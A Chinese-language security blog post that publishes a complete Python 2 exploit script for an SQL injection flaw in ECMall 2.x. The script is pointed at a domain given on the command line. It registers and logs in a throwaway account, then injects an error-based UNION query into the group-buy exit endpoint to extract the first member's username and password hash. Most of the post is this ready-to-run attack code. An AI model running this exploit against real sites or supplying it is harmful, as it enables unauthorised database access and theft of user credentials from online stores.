python编程：ecmall 2.x通杀SQL注入漏洞利用exp |

显示不全请点击全屏阅读

今天看到的这个漏洞 {ecmall 2.x通杀SQL注入}，在公司现在主要做安全研究，写了份分析报告，漏洞分析都要写exp，exp顺便发到博客来，写的比较简单。

PS：公司还缺两个安全服务工程师，一个安全研究员。安全服务工程师的招聘信息看：http://www.cnseay.com/3440/

 

EXP：

 

#coding=utf-8
#author:Seay
#blog:www.cnseay.com
  
import HTMLParser  
import urlparse  
import urllib
import urllib2  
import cookielib  
import string  
import re
import sys
  
target = 'www.cnseay.com'
user_name = 'makelove'
password = 'onebyone'
email = '[email protected]'

def reguser():

    print('user register...')
    hosturl = 'http://' + target + '/index.php'

    posturl = 'http://' + target + '/index.php?app=member&act=register&ret_url='
  
 
    cj = cookielib.LWPCookieJar()  
    cookie_support = urllib2.HTTPCookieProcessor(cj)  
    opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)  
    urllib2.install_opener(opener)  
  
       
    h = urllib2.urlopen(hosturl)  
  
     
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',  
               'Content-Type' : 'application/x-www-form-urlencoded'}  
    
    postData = {'user_name' : user_name,  
                'password' : password,  
                'password_confirm' : password, 
                'email' : email, 
                'agree' : '1', 
                }  
  
   
    postData = urllib.urlencode(postData)  
    
    request = urllib2.Request(posturl, postData, headers)
    urllib2.urlopen(request)  
    

def login_exploit():

    print('user login...')
    hosturl = 'http://' + target + '/index.php' 
    
    posturl = 'http://' + target + '/index.php?app=member&act=login&synlogout=1'
  
    
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',  
               'Content-Type' : 'application/x-www-form-urlencoded'}  
 
    postData = {'user_name' : user_name,  
                'password' : password,  
                }  
  
    cj = cookielib.LWPCookieJar()  
    cookie_support = urllib2.HTTPCookieProcessor(cj)  
    opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)  
    urllib2.install_opener(opener)  

    postData = urllib.urlencode(postData)  

    request = urllib2.Request(posturl, postData, headers)
    
    response = urllib2.urlopen(request)  

    print('exploit...\n')
    url='http://'+target+'/index.php?app=buyer_groupbuy&act=exit_group&id='+urllib.quote('1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b')
    cookies = response.headers["Set-cookie"].split(";")[0]

    request = urllib2.Request(url) 
    request.add_header('Cookie', cookies)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0')

    response = urllib2.urlopen(request)

    text = response.read() 
    response.close()

    prog = re.search("Duplicate entry '1(.*)' for key",text)
    try:
        print('Success：'+prog.groups()[0])
    except:
        print('Sorry,failed')


if __name__ == '__main__':
    if len(sys.argv)<2:
        print('argument error')
        print('example: '+sys.argv[0]+' domain')
        exit(0)
    target=sys.argv[1]
    reguser()
    login_exploit()

Tags：

ecmall漏洞, python编程,

如果您喜欢我的博客，欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你，也可微信扫下方二维码打赏本人一杯咖啡